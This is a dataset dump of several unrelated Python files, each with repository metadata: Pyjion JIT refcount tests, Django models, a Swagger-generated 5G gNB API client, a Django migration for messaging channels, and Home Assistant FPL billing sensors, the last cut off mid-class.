sys.getrefcount(a) == pre_ref_a assert sys.getrefcount(b) == pre_ref_b assert sys.getrefcount(c) == pre_ref_c info = pyjion.info(arg3) assert info.compiled, info.compile_result class TestObjectMethodCalls: def test_arg0(self): class F: def arg0(cls) -> int: a = 1 b = 2 c = 3 d = 4 return a + b + c + d f = F() assert sys.getrefcount(F) in [6, 7] # PGC will keep a ref on first pass assert sys.getrefcount(f) == 2 assert f.arg0() == 10 assert sys.getrefcount(F.arg0) == 3 assert sys.getrefcount(f) == 2 info = pyjion.info(f.arg0.__code__) assert info.compiled, info.compile_result def test_arg0_cfunction(self): f = str("hello") pre_target_ref = sys.getrefcount(str.title) pre_arg_ref = sys.getrefcount(f) assert f.title() == "Hello" assert sys.getrefcount(f) == pre_arg_ref info = pyjion.info(self.test_arg0_cfunction.__code__) assert info.compiled, info.compile_result def test_arg1(self): class F: def arg1(self, e): a = '1' b = '2' c = '3' d = '4' return a + b + c + d + e f = F() test_arg1_arg1 = '5' pre_refcnt_a = sys.getrefcount(test_arg1_arg1) assert sys.getrefcount(F) in [6, 7] # PGC will keep a ref on first pass assert sys.getrefcount(f) == 2 assert f.arg1(test_arg1_arg1) == '12345' assert sys.getrefcount(f) == 2 assert pre_refcnt_a == sys.getrefcount(test_arg1_arg1) info = pyjion.info(f.arg1.__code__) assert info.compiled, info.compile_result def test_arg1_cfunction(self): f = str("hello") o = "o" pre_target_ref = sys.getrefcount(str.strip) pre_arg_ref = sys.getrefcount(f) pre_arg1_ref = sys.getrefcount(o) assert f.strip(o) == "hell" assert sys.getrefcount(f) == pre_arg_ref assert sys.getrefcount(o) == pre_arg1_ref info = pyjion.info(self.test_arg1_cfunction.__code__) assert info.compiled, info.compile_result def test_arg1_cfunction_exc(self): f = str("hello") o = 1000000 pre_target_ref = sys.getrefcount(str.strip) pre_arg_ref = sys.getrefcount(f) pre_arg1_ref = sys.getrefcount(o) pytest.raises(TypeError, f.strip, o) assert sys.getrefcount(f) == pre_arg_ref assert sys.getrefcount(o) == pre_arg1_ref assert sys.getrefcount(str.strip) == pre_target_ref + 1 info = pyjion.info(self.test_arg1_cfunction_exc.__code__) assert info.compiled, info.compile_result def test_arg2(self): class F: def arg2(self, e, f): a = 1 b = 2 c = 3 d = 4 return a + b + c + d + e + f f = F() assert f.arg2(5, 6) == 21 info = pyjion.info(f.arg2.__code__) assert info.compiled, info.compile_result def test_arg3(self): class F: def arg3(self, e, f, g): a = 1 b = 2 c = 3 d = 4 return a + b + c + d + e + f + g f = F() assert f.arg3(5, 6, 7) == 28 info = pyjion.info(f.arg3.__code__) assert info.compiled, info.compile_result def test_arg4(self): class F: def arg4(self, e, f, g, h): a = 1 b = 2 c = 3 d = 4 return a + b + c + d + e + f + g + h f = F() assert f.arg4(5, 6, 7, 8) == 36 info = pyjion.info(f.arg4.__code__) assert info.compiled, info.compile_result def test_arg5(self): class F: def arg5(self, e, f, g, h, i): a = 1 b = 2 c = 3 d = 4 return a + b + c + d + e + f + g + h + i f = F() assert f.arg5(5, 6, 7, 8, 9) == 45 info = pyjion.info(f.arg5.__code__) assert info.compiled, info.compile_result def test_arg6(self): class F: def arg6(self, e, f, g, h, i, j): a = 1 b = 2 c = 3 d = 4 return a + b + c + d + e + f + g + h + i + j f = F() assert f.arg6(5, 6, 7, 8, 9, 10) == 55 info = pyjion.info(f.arg6.__code__) assert info.compiled, info.compile_result def test_arg7(self): class F: def arg7(self, e, f, g, h, i, j, k): a = 1 b = 2 c = 3 d = 4 return a + b + c + d + e + f + g + h + i + j + k f = F() assert f.arg7(5, 6, 7, 8, 9, 10, 11) == 66 info = pyjion.info(f.arg7.__code__) assert info.compiled, info.compile_result def test_arg8(self): class F: def arg8(self, e, f, g, h, i, j, k, l): a = 1 b = 2 c = 3 d = 4 return a + b + c + d + e + f + g + h + i + j + k + l f = F() assert f.arg8(5, 6, 7, 8, 9, 10, 11, 12) == 78 info = pyjion.info(f.arg8.__code__) assert info.compiled, info.compile_result def test_arg9(self): class F: def arg9(self, e, f, g, h, i, j, k, l, m): a = 1 b = 2 c = 3 d = 4 return a + b + c + d + e + f + g + h + i + j + k + l + m f = F() assert f.arg9(5, 6, 7, 8, 9, 10, 11, 12, 13) == 91 info = pyjion.info(f.arg9.__code__) assert info.compiled, info.compile_result def test_arg10(self): class F: def arg10(self, e, f, g, h, i, j, k, l, m, n): a = 1 b = 2 c = 3 d = 4 return a + b + c + d + e + f + g + h + i + j + k + l + m + n f = F() assert f.arg10(5, 6, 7, 8, 9, 10, 11, 12, 13, 14) == 105 info = pyjion.info(f.arg10.__code__) assert info.compiled, info.compile_result def test_arg15(self): class F: def arg15(self, e, f, g, h, i, j, k, l, m, n, o, p, q, r): a = '1' b = '2' c = '3' d = '4' return a + b + c + d + e + f + g + h + i + j + k + l + m + n + o f = F() arg1 = '5' pre_refcnt_a = sys.getrefcount(arg1) assert sys.getrefcount(F.arg15) == 3 assert sys.getrefcount(F) in [6, 7] # PGC will keep a ref on first pass assert sys.getrefcount(f) == 2 assert f.arg15(arg1, '6', '7', '8', '9', '10', '11', '12', '13', '14', '15' ,'16', '17', '18') == '123456789101112131415' assert sys.getrefcount(F.arg15) == 3 assert sys.getrefcount(f) == 2 assert pre_refcnt_a == sys.getrefcount(arg1) info = pyjion.info(f.arg15.__code__) assert info.compiled, info.compile_result def test_arg15_exc(self): class F: def arg15(self, e, f, g, h, i, j, k, l, m, n, o, p, q, r): raise ValueError f = F() arg1 = '5' pre_refcnt_a = sys.getrefcount(arg1) assert sys.getrefcount(F.arg15) == 3 assert sys.getrefcount(F) in [6, 7] # PGC will keep a ref on first pass assert sys.getrefcount(f) == 2 pytest.raises(ValueError, f.arg15, arg1, '6', '7', '8', '9', '10', '11', '12', '13', '14', '15' ,'16', '17', '18') assert sys.getrefcount(F.arg15) == 3 assert sys.getrefcount(f) == 2 assert pre_refcnt_a == sys.getrefcount(arg1) info = pyjion.info(f.arg15.__code__) assert info.compiled, info.compile_result def test_arg15_cfunction(self): f = str("{}{}{}{}{}{}{}{}{}{}{}{}{}{}") arg1 = '5' pre_refcnt = sys.getrefcount(f) pre_refcnt_a = sys.getrefcount(arg1) target_pre_refcnt = sys.getrefcount(str.format) assert f.format(arg1, '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18') == "56789101112131415161718" assert sys.getrefcount(f) == pre_refcnt assert sys.getrefcount(str.format) == target_pre_refcnt + 1 assert sys.getrefcount(arg1) == pre_refcnt_a info = pyjion.info(self.test_arg15_cfunction.__code__) assert info.compiled, info.compile_result def test_arg15_cfunction_exc(self): f = str("{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}") arg1 = '5' pre_refcnt = sys.getrefcount(f) pre_refcnt_a = sys.getrefcount(arg1) target_pre_refcnt = sys.getrefcount(str.format) pytest.raises(IndexError, f.format, arg1, '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18') assert sys.getrefcount(f) == pre_refcnt assert sys.getrefcount(str.format) == target_pre_refcnt + 1 assert sys.getrefcount(arg1) == pre_refcnt_a info = pyjion.info(self.test_arg15_cfunction_exc.__code__) assert info.compiled, info.compile_result

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0.033834

0.171085

0.155179

0.096728

0.930299

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0.879025

0.873206

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0

0.068668

0.379994

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0

null

0

1

0

1

0

null

0

7

51961d688a25a07c0a7c521854e41150f51bf9ad

727

py

Python

nautobatfishbot/models.py

jkraszewski/nautobatfishbot

c95b687b3612021fa47943088aa71e39631d4653

[ "Apache-2.0" ]

1

2021-04-24T00:14:03.000Z

nautobatfishbot/models.py

jkraszewski/nautobatfishbot

c95b687b3612021fa47943088aa71e39631d4653

[ "Apache-2.0" ]

null

nautobatfishbot/models.py

jkraszewski/nautobatfishbot

c95b687b3612021fa47943088aa71e39631d4653

[ "Apache-2.0" ]

null

# models.py from django.db import models class tests_to_run(models.Model): test_name = models.CharField(max_length=250) source_ip = models.CharField(max_length=250) source_port = models.CharField(max_length=250) dest_ip = models.CharField(max_length=250) dest_port = models.CharField(max_length=250) def __str__(self): return self.name class server_groups(models.Model): group_name = models.CharField(max_length=250) ip = models.CharField(max_length=250) def __str__(self): return self.name class port_groups(models.Model): group_name = models.CharField(max_length=250) port = models.CharField(max_length=250) def __str__(self): return self.name

24.233333

50

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727

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0.329939

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727

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0.052632

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1

0

null

1

0

null

0

1

0

7

519b8a3590adccc0780229f1858ed7e89498a0d5

19,947

py

Python

evolved5g/swagger_client/api/g_n_bs_api.py

EVOLVED-5G/SDK-CLI

0f289c7b21c14c3e349164d21cc78d9b6af0a237

[ "Apache-2.0" ]

3

2021-10-19T14:37:14.000Z

2021-11-01T10:43:33.000Z

evolved5g/swagger_client/api/g_n_bs_api.py

skolome/evolved5g_cli

b202a878befe22b8dda66ee05610408777f4f006

[ "Apache-2.0" ]

14

2021-11-02T10:30:56.000Z

2022-03-10T11:30:59.000Z

evolved5g/swagger_client/api/g_n_bs_api.py

skolome/evolved5g_cli

b202a878befe22b8dda66ee05610408777f4f006

[ "Apache-2.0" ]

1

2021-11-16T16:20:31.000Z

# coding: utf-8 """ NEF_Emulator No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501 OpenAPI spec version: 0.1.0 Generated by: https://github.com/swagger-api/swagger-codegen.git """ from __future__ import absolute_import import re # noqa: F401 # python 2 and python 3 compatibility library import six from evolved5g.swagger_client.api_client import ApiClient class GNBsApi(object): """NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually. Ref: https://github.com/swagger-api/swagger-codegen """ def __init__(self, api_client=None): if api_client is None: api_client = ApiClient() self.api_client = api_client def create_gnb_api_v1_gn_bs_post(self, body, **kwargs): # noqa: E501 """Create Gnb # noqa: E501 Create new gNB. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.create_gnb_api_v1_gn_bs_post(body, async_req=True) >>> result = thread.get() :param async_req bool :param GNBCreate body: (required) :return: GNB If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.create_gnb_api_v1_gn_bs_post_with_http_info(body, **kwargs) # noqa: E501 else: (data) = self.create_gnb_api_v1_gn_bs_post_with_http_info(body, **kwargs) # noqa: E501 return data def create_gnb_api_v1_gn_bs_post_with_http_info(self, body, **kwargs): # noqa: E501 """Create Gnb # noqa: E501 Create new gNB. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.create_gnb_api_v1_gn_bs_post_with_http_info(body, async_req=True) >>> result = thread.get() :param async_req bool :param GNBCreate body: (required) :return: GNB If the method is called asynchronously, returns the request thread. """ all_params = ['body'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method create_gnb_api_v1_gn_bs_post" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'body' is set if ('body' not in params or params['body'] is None): raise ValueError("Missing the required parameter `body` when calling `create_gnb_api_v1_gn_bs_post`") # noqa: E501 collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None if 'body' in params: body_params = params['body'] # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501 ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['OAuth2PasswordBearer'] # noqa: E501 return self.api_client.call_api( '/api/v1/gNBs', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='GNB', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def delete_gnb_api_v1_gn_bs_gnb_id_delete(self, g_nb_id, **kwargs): # noqa: E501 """Delete Gnb # noqa: E501 Delete a gNB. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.delete_gnb_api_v1_gn_bs_gnb_id_delete(g_nb_id, async_req=True) >>> result = thread.get() :param async_req bool :param str g_nb_id: The gNB id of the gNB you want to delete (required) :return: GNB If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.delete_gnb_api_v1_gn_bs_gnb_id_delete_with_http_info(g_nb_id, **kwargs) # noqa: E501 else: (data) = self.delete_gnb_api_v1_gn_bs_gnb_id_delete_with_http_info(g_nb_id, **kwargs) # noqa: E501 return data def delete_gnb_api_v1_gn_bs_gnb_id_delete_with_http_info(self, g_nb_id, **kwargs): # noqa: E501 """Delete Gnb # noqa: E501 Delete a gNB. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.delete_gnb_api_v1_gn_bs_gnb_id_delete_with_http_info(g_nb_id, async_req=True) >>> result = thread.get() :param async_req bool :param str g_nb_id: The gNB id of the gNB you want to delete (required) :return: GNB If the method is called asynchronously, returns the request thread. """ all_params = ['g_nb_id'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method delete_gnb_api_v1_gn_bs_gnb_id_delete" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'g_nb_id' is set if ('g_nb_id' not in params or params['g_nb_id'] is None): raise ValueError("Missing the required parameter `g_nb_id` when calling `delete_gnb_api_v1_gn_bs_gnb_id_delete`") # noqa: E501 collection_formats = {} path_params = {} if 'g_nb_id' in params: path_params['gNB_id'] = params['g_nb_id'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['OAuth2PasswordBearer'] # noqa: E501 return self.api_client.call_api( '/api/v1/gNBs/{gNB_id}', 'DELETE', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='GNB', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def read_gn_bs_api_v1_gn_bs_get(self, **kwargs): # noqa: E501 """Read Gnbs # noqa: E501 Retrieve gNBs. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.read_gn_bs_api_v1_gn_bs_get(async_req=True) >>> result = thread.get() :param async_req bool :param int skip: :param int limit: :return: list[GNB] If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.read_gn_bs_api_v1_gn_bs_get_with_http_info(**kwargs) # noqa: E501 else: (data) = self.read_gn_bs_api_v1_gn_bs_get_with_http_info(**kwargs) # noqa: E501 return data def read_gn_bs_api_v1_gn_bs_get_with_http_info(self, **kwargs): # noqa: E501 """Read Gnbs # noqa: E501 Retrieve gNBs. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.read_gn_bs_api_v1_gn_bs_get_with_http_info(async_req=True) >>> result = thread.get() :param async_req bool :param int skip: :param int limit: :return: list[GNB] If the method is called asynchronously, returns the request thread. """ all_params = ['skip', 'limit'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method read_gn_bs_api_v1_gn_bs_get" % key ) params[key] = val del params['kwargs'] collection_formats = {} path_params = {} query_params = [] if 'skip' in params: query_params.append(('skip', params['skip'])) # noqa: E501 if 'limit' in params: query_params.append(('limit', params['limit'])) # noqa: E501 header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['OAuth2PasswordBearer'] # noqa: E501 return self.api_client.call_api( '/api/v1/gNBs', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='list[GNB]', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def read_gnb_api_v1_gn_bs_gnb_id_get(self, g_nb_id, **kwargs): # noqa: E501 """Read Gnb # noqa: E501 Get gNB by ID. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.read_gnb_api_v1_gn_bs_gnb_id_get(g_nb_id, async_req=True) >>> result = thread.get() :param async_req bool :param str g_nb_id: The gNB id of the gNB you want to retrieve (required) :return: GNB If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.read_gnb_api_v1_gn_bs_gnb_id_get_with_http_info(g_nb_id, **kwargs) # noqa: E501 else: (data) = self.read_gnb_api_v1_gn_bs_gnb_id_get_with_http_info(g_nb_id, **kwargs) # noqa: E501 return data def read_gnb_api_v1_gn_bs_gnb_id_get_with_http_info(self, g_nb_id, **kwargs): # noqa: E501 """Read Gnb # noqa: E501 Get gNB by ID. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.read_gnb_api_v1_gn_bs_gnb_id_get_with_http_info(g_nb_id, async_req=True) >>> result = thread.get() :param async_req bool :param str g_nb_id: The gNB id of the gNB you want to retrieve (required) :return: GNB If the method is called asynchronously, returns the request thread. """ all_params = ['g_nb_id'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method read_gnb_api_v1_gn_bs_gnb_id_get" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'g_nb_id' is set if ('g_nb_id' not in params or params['g_nb_id'] is None): raise ValueError("Missing the required parameter `g_nb_id` when calling `read_gnb_api_v1_gn_bs_gnb_id_get`") # noqa: E501 collection_formats = {} path_params = {} if 'g_nb_id' in params: path_params['gNB_id'] = params['g_nb_id'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['OAuth2PasswordBearer'] # noqa: E501 return self.api_client.call_api( '/api/v1/gNBs/{gNB_id}', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='GNB', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def update_gnb_api_v1_gn_bs_gnb_id_put(self, body, g_nb_id, **kwargs): # noqa: E501 """Update Gnb # noqa: E501 Update a gNB. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.update_gnb_api_v1_gn_bs_gnb_id_put(body, g_nb_id, async_req=True) >>> result = thread.get() :param async_req bool :param GNBUpdate body: (required) :param str g_nb_id: The gNB id of the gNB you want to update (required) :return: GNB If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.update_gnb_api_v1_gn_bs_gnb_id_put_with_http_info(body, g_nb_id, **kwargs) # noqa: E501 else: (data) = self.update_gnb_api_v1_gn_bs_gnb_id_put_with_http_info(body, g_nb_id, **kwargs) # noqa: E501 return data def update_gnb_api_v1_gn_bs_gnb_id_put_with_http_info(self, body, g_nb_id, **kwargs): # noqa: E501 """Update Gnb # noqa: E501 Update a gNB. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.update_gnb_api_v1_gn_bs_gnb_id_put_with_http_info(body, g_nb_id, async_req=True) >>> result = thread.get() :param async_req bool :param GNBUpdate body: (required) :param str g_nb_id: The gNB id of the gNB you want to update (required) :return: GNB If the method is called asynchronously, returns the request thread. """ all_params = ['body', 'g_nb_id'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method update_gnb_api_v1_gn_bs_gnb_id_put" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'body' is set if ('body' not in params or params['body'] is None): raise ValueError("Missing the required parameter `body` when calling `update_gnb_api_v1_gn_bs_gnb_id_put`") # noqa: E501 # verify the required parameter 'g_nb_id' is set if ('g_nb_id' not in params or params['g_nb_id'] is None): raise ValueError("Missing the required parameter `g_nb_id` when calling `update_gnb_api_v1_gn_bs_gnb_id_put`") # noqa: E501 collection_formats = {} path_params = {} if 'g_nb_id' in params: path_params['gNB_id'] = params['g_nb_id'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None if 'body' in params: body_params = params['body'] # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501 ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['OAuth2PasswordBearer'] # noqa: E501 return self.api_client.call_api( '/api/v1/gNBs/{gNB_id}', 'PUT', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='GNB', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats)

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null

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null

0

8

51f02e81b3f6a6d44712bcbd89321a31bb62f53f

46

py

Python

ldt/experiments/default_workflow/__init__.py

Darkdragon84/ldt

0f65dc515a22c8bef159ef087071d691062fbc61

[ "Apache-2.0" ]

14

2018-09-27T18:28:28.000Z

2021-11-23T16:17:04.000Z

ldt/experiments/default_workflow/__init__.py

Darkdragon84/ldt

0f65dc515a22c8bef159ef087071d691062fbc61

[ "Apache-2.0" ]

3

2018-11-13T16:50:33.000Z

2021-05-07T16:34:24.000Z

ldt/experiments/default_workflow/__init__.py

Darkdragon84/ldt

0f65dc515a22c8bef159ef087071d691062fbc61

[ "Apache-2.0" ]

4

2019-01-19T14:52:38.000Z

2021-05-12T10:55:17.000Z

from .default_workflow import default_workflow

46

0.913043

6

46

6.666667

0.666667

0.75

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0.065217

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1

46

0.930233

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0

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0

1

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1

0

7

cfa2c464c69b12c4b8c23c5cc889fcef4a814455

5,173

py

Python

message_sender/migrations/0012_channel_insert.py

praekeltfoundation/seed-message-sender

d90ef4dc9fa248df97ca97f07569c6c70afcd1bd

[ "BSD-3-Clause" ]

1

2017-01-03T08:53:18.000Z

message_sender/migrations/0012_channel_insert.py

praekelt/seed-message-sender

d90ef4dc9fa248df97ca97f07569c6c70afcd1bd

[ "BSD-3-Clause" ]

45

2016-03-16T09:32:27.000Z

2018-06-28T10:05:19.000Z

message_sender/migrations/0012_channel_insert.py

praekeltfoundation/seed-message-sender

d90ef4dc9fa248df97ca97f07569c6c70afcd1bd

[ "BSD-3-Clause" ]

1

2016-09-28T09:32:05.000Z

# -*- coding: utf-8 -*- # Generated by Django 1.9.12 on 2017-04-19 11:57 from __future__ import unicode_literals import os from django.db import migrations from django.conf import settings def insert_channels(apps, schema_editor): default = True Channel = apps.get_model("message_sender.channel") if settings.MESSAGE_BACKEND_TEXT == "vumi": if not Channel.objects.filter(channel_id="VUMI_TEXT").exists(): vumi_url = os.environ.get("MESSAGE_SENDER_VUMI_API_URL_TEXT") vumi_account_key = os.environ.get("MESSAGE_SENDER_VUMI_ACCOUNT_KEY_TEXT") vumi_conv_key = os.environ.get("MESSAGE_SENDER_VUMI_CONVERSATION_KEY_TEXT") vumi_acc_token = os.environ.get("MESSAGE_SENDER_VUMI_ACCOUNT_TOKEN_TEXT") if vumi_url and vumi_account_key and vumi_conv_key and vumi_acc_token: channel = Channel() channel.channel_id = "VUMI_TEXT" channel.default = default channel.channel_type = "vumi" channel.concurrency_limit = settings.CONCURRENT_TEXT_LIMIT channel.message_delay = settings.TEXT_MESSAGE_DELAY channel.message_timeout = settings.TEXT_MESSAGE_TIMEOUT channel.configuration = { "VUMI_API_URL": vumi_url, "VUMI_ACCOUNT_KEY": vumi_account_key, "VUMI_CONVERSATION_KEY": vumi_conv_key, "VUMI_ACCOUNT_TOKEN": vumi_acc_token, } channel.save() default = False elif settings.MESSAGE_BACKEND_TEXT == "junebug": if not Channel.objects.filter(channel_id="JUNEBUG_TEXT").exists(): june_url = os.environ.get("MESSAGE_SENDER_JUNEBUG_API_URL_TEXT") june_auth = os.environ.get("MESSAGE_SENDER_JUNEBUG_API_AUTH_TEXT") june_from = os.environ.get("MESSAGE_SENDER_JUNEBUG_API_FROM_TEXT") if june_url and june_auth and june_from: channel = Channel() channel.channel_id = "JUNEBUG_TEXT" channel.default = default channel.channel_type = "junebug" channel.concurrency_limit = settings.CONCURRENT_TEXT_LIMIT channel.message_delay = settings.TEXT_MESSAGE_DELAY channel.message_timeout = settings.TEXT_MESSAGE_TIMEOUT channel.configuration = { "JUNEBUG_API_URL": june_url, "JUNEBUG_API_AUTH": june_auth, "JUNEBUG_API_FROM": june_from, } channel.save() default = False if settings.MESSAGE_BACKEND_VOICE == "vumi": if not Channel.objects.filter(channel_id="VUMI_VOICE").exists(): vumi_url = os.environ.get("MESSAGE_SENDER_VUMI_API_URL_VOICE") vumi_account_key = os.environ.get("MESSAGE_SENDER_VUMI_ACCOUNT_KEY_VOICE") vumi_conv_key = os.environ.get("MESSAGE_SENDER_VUMI_CONVERSATION_KEY_VOICE") vumi_acc_token = os.environ.get("MESSAGE_SENDER_VUMI_ACCOUNT_TOKEN_VOICE") if vumi_url and vumi_account_key and vumi_conv_key and vumi_acc_token: channel = Channel() channel.channel_id = "VUMI_VOICE" channel.default = default channel.channel_type = "vumi" channel.concurrency_limit = settings.CONCURRENT_VOICE_LIMIT channel.message_delay = settings.VOICE_MESSAGE_DELAY channel.message_timeout = settings.VOICE_MESSAGE_TIMEOUT channel.configuration = { "VUMI_API_URL": vumi_url, "VUMI_ACCOUNT_KEY": vumi_account_key, "VUMI_CONVERSATION_KEY": vumi_conv_key, "VUMI_ACCOUNT_TOKEN": vumi_acc_token, } channel.save() default = False elif settings.MESSAGE_BACKEND_VOICE == "junebug": if not Channel.objects.filter(channel_id="JUNEBUG_VOICE").exists(): june_url = os.environ.get("MESSAGE_SENDER_JUNEBUG_API_URL_VOICE") june_auth = os.environ.get("MESSAGE_SENDER_JUNEBUG_API_AUTH_VOICE") june_from = os.environ.get("MESSAGE_SENDER_JUNEBUG_API_FROM_VOICE") if june_url and june_auth and june_from: channel = Channel() channel.channel_id = "JUNEBUG_VOICE" channel.default = default channel.channel_type = "junebug" channel.concurrency_limit = settings.CONCURRENT_VOICE_LIMIT channel.message_delay = settings.VOICE_MESSAGE_DELAY channel.message_timeout = settings.VOICE_MESSAGE_TIMEOUT channel.configuration = { "JUNEBUG_API_URL": june_url, "JUNEBUG_API_AUTH": june_auth, "JUNEBUG_API_FROM": june_from, } channel.save() class Migration(migrations.Migration): dependencies = [("message_sender", "0011_channel")] operations = [migrations.RunPython(insert_channels)]

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0.069519

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0

null

0

1

0

1

0

null

0

7

cfc05a9c876cfbe6aad6c52d813d19101bef7933

3,234

py

Python

custom_components/fpl/sensor_DatesSensor.py

flyboy013/hass-fpl

5eec090c2c49dc07ba0e2fe6bbb341c917a281d1

[ "MIT" ]

1

2022-02-15T17:42:00.000Z

custom_components/fpl/sensor_DatesSensor.py

flyboy013/hass-fpl

5eec090c2c49dc07ba0e2fe6bbb341c917a281d1

[ "MIT" ]

null

custom_components/fpl/sensor_DatesSensor.py

flyboy013/hass-fpl

5eec090c2c49dc07ba0e2fe6bbb341c917a281d1

[ "MIT" ]

null

from .fplEntity import FplEntity import datetime class CurrentBillDateSensor(FplEntity): def __init__(self, coordinator, config, account): super().__init__(coordinator, config, account, "Billing Current Date") @property def state(self): try: self._state= datetime.date.fromisoformat(self.getData("current_bill_date")) except: pass return self._state @property def icon(self): return "mdi:calendar" def defineAttributes(self): """Return the state attributes.""" attributes = {} attributes["device_class"] = "date" attributes["friendly_name"] = "Billing Current" return attributes class NextBillDateSensor(FplEntity): def __init__(self, coordinator, config, account): super().__init__(coordinator, config, account, "Billing Next") @property def state(self): try: self._state= datetime.date.fromisoformat(self.getData("next_bill_date")) except: pass return self._state @property def icon(self): return "mdi:calendar" def defineAttributes(self): """Return the state attributes.""" attributes = {} attributes["device_class"] = "date" attributes["friendly_name"] = "Billing Next" return attributes class ServiceDaysSensor(FplEntity): def __init__(self, coordinator, config, account): super().__init__(coordinator, config, account, "Billing Total Days") @property def state(self): try: self._state= self.getData("service_days") except: pass return self._state @property def icon(self): return "mdi:calendar" def defineAttributes(self): """Return the state attributes.""" attributes = {} attributes["unit_of_measurement"] = "days" attributes["friendly_name"] = "Billing Total" return attributes class AsOfDaysSensor(FplEntity): def __init__(self, coordinator, config, account): super().__init__(coordinator, config, account, "Billing As Of") @property def state(self): try: self._state= self.getData("as_of_days") except: pass return self._state @property def icon(self): return "mdi:calendar" def defineAttributes(self): 